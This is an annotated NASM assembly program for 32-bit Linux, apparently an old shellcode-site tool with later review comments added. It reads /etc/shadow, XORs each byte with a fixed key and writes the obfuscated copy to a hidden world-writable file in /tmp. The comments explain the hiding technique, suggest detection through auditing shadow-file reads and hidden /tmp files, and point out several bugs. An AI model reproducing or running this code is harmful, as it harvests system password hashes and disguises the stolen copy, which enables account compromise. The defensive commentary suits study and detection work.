; $Linux version 2.2.20 (root@mothership) (gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)) 
; 
; s0t4ipv6@shellcode.com.ar
;
segment .text

global main

;-----------------------------------------------------------------------
; main -- program entry.
; Syntax/ABI: NASM, 32-bit x86 Linux, raw int 80h syscalls
;             (eax = syscall number, ebx/ecx/edx = first three args).
;
; Opens the path at `temp` for output and the path at `file` for input,
; then leaves ebx = input fd, eax = 0, edx = 1 and falls through into
; `lup`, which copies the input one byte at a time.
;
; Security context: `file` is /etc/shadow (password hashes, normally
; readable only by privileged accounts) and `temp` is a dot-file under
; /tmp requested with mode 777. Every copied byte is XORed with 7fh in
; `codeo`, so the copy on disk will not match plain-text patterns for
; shadow entries. Auditing reads of /etc/shadow by unexpected processes
; and watching for hidden files created in /tmp covers this behaviour.
;
; Neither open call is checked for failure; a negative errno would be
; used as a file descriptor by the code that follows.
;-----------------------------------------------------------------------
main:
	; C convention: standard frame-pointer prologue
	push	ebp
	mov	ebp, esp
	sub	esp, 04h	; reserve 4 bytes ([ebp-4]) as a frame for the working character

	mov	ebx, temp	; arg1: output path
	mov	eax, 05h	; sys_open
	; NOTE(review): the original comment calls this O_CREAT, but 66h has
	; bits set beyond O_CREAT (40h on i386 Linux); the literal does not
	; match the comment -- confirm the intended flags.
	mov	ecx, 66h	; arg2: open flags (see note above)
	mov	edx, 1ffh	; arg3: mode, 777 in octal (effective mode still depends on umask)
	int	80h
	mov	[addr], eax	; keep the output fd for the write in codeo
	mov	ebx,file	; arg1: input path
	mov	eax, 05h		; sys_open
	xor	ecx, ecx	; arg2: flags = 0 (read-only)
	int	80h

; Register snapshot recorded by the author at this point:
; eax = 0x5 ebx = 0x80483c0 ecx = 0x2 edx = 0x2108b8

	xchg	ebx, eax	; ebx = input fd returned by the second open
	xor	eax,eax
	xor	edx,edx
	; Intent: put zeros on the stack.
	; NOTE(review): [ebp] is where the prologue's push stored the caller's
	; ebp; the slot reserved by `sub esp, 04h` is [ebp-4]. The program
	; leaves through sys_exit and never pops ebp, so the overwritten value
	; is not read back in this file.
	mov	[ebp],eax	; store 0 at [ebp]
	inc	edx		; edx = 1: read one character at a time

; lup -- per-byte read loop.
; In:  ebx = input fd, edx = 1 (byte count).
;      Only al is written before each int 80h, so the syscall number is
;      correct only while the upper 24 bits of eax are zero, i.e. while
;      the previous syscall returned a small non-negative value.
; Flow: read(ebx, buf, 1); a nonzero result goes to codeo, a zero result
;      (end of input) closes the input fd and exits.
lup:	lea	ecx, [buf]	; arg2: one-byte transfer buffer
	mov	byte al, 03h	; sys_read
	int	80h
	test	eax, eax
	jne	codeo		; any nonzero return is handled as "one byte read";
				; a negative errno from read is not told apart here

        mov     byte al, 06h    ; sys_close on the input fd (eax was 0, so eax = 6)
        int     80h
        inc     eax             ; sys_exit: eax becomes 1 only if close returned 0
        int     80h             ; exit status = ebx, which still holds the input fd number
; The output fd saved in [addr] is not closed explicitly before exit.
; Register snapshot recorded by the author:
; eax = 0x0 ; ebx = 0x5 ; ecx = 0xbffffa0c ; edx = 0x1
; codeo -- transform the byte just read and write it to the output fd.
; In:  ebx = input fd, ecx = address of buf, edx = 1,
;      eax = return value of the read in lup.
; Out: jumps back to lup with ebx restored to the input fd and eax
;      holding the return value of the write (not checked).
codeo:
	push	ebx		; save the input file descriptor across the write
	mov	byte al, [buf]	; al = the byte just read
	xor	byte al, 7fh	; XOR with the fixed single-byte key 7fh
	; NOTE(review): this is a 4-byte store, while buf is declared as 2
	; bytes; the extra bytes land on the start of `file`, which directly
	; follows buf in .data. The path has already been passed to open by
	; this point.
	mov	[buf], eax	; put the transformed byte back in buf
	mov	ebx, [addr]	; arg1: output fd saved in main
	mov	byte al, 04h	; sys_write (ecx = buf and edx = 1 are unchanged)
	int 	80h		; write one transformed byte
	pop	ebx		; restore the input fd
	jmp	lup

; Writable data used by main, lup and codeo.
segment	.data
buf:	db	'0',0			; 2 bytes; one-byte transfer buffer for read/write
file:	db	'/etc/shadow',0		; input path: system password-hash file
temp:	db	'/tmp/.vik',0		; output path: hidden (dot-prefixed) file in /tmp
addr:	dw	'0',0			; two words = 4 bytes; main stores the output fd here

